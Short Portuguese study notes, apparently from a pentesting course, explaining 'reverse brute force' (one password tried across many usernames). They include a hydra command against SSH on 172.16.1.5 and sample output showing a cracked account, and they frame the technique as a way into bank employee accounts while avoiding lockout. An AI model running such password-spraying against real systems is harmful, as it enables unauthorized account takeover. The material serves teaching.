## Reverse Brute Force

- + Realiza o ataque de força bruta no login e não na senha.
- +Exemplo:
- → tentar usar uma senha específica em diversos logins (100928)
- +Exemplo didático:

```
hydra -v -L users.txt -p admin 172.16.1.5 ssh
```

- → Essa usabilidade pode ser eficiente quando estamos dentro de redes como a de um banco em que há diversos funcionários e queremos ganhar acesso à conta de qqer um deles [claro, caso o haja sistema de bloqueio para 3 tentativas na senha]
- + Caso funcione, essa será a mensagem exibida:

```
[DATA] max 5 tasks per 1 server, overatt 5 tasks, 5 togin tries (t:5/p:1), ~1 try per task
[DATA] attacking ssh://172.16.1.5:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://rogerio@172.16.1.5:22
[INFO] Successful, password authentication is supported by ssh://172.16.1.5:22
[22][ssh] host: 172.16.1.5 login: ricardo password: admin
[STATUS] attack finished for 172.16.1.5 (waiting for children to complete tests)
```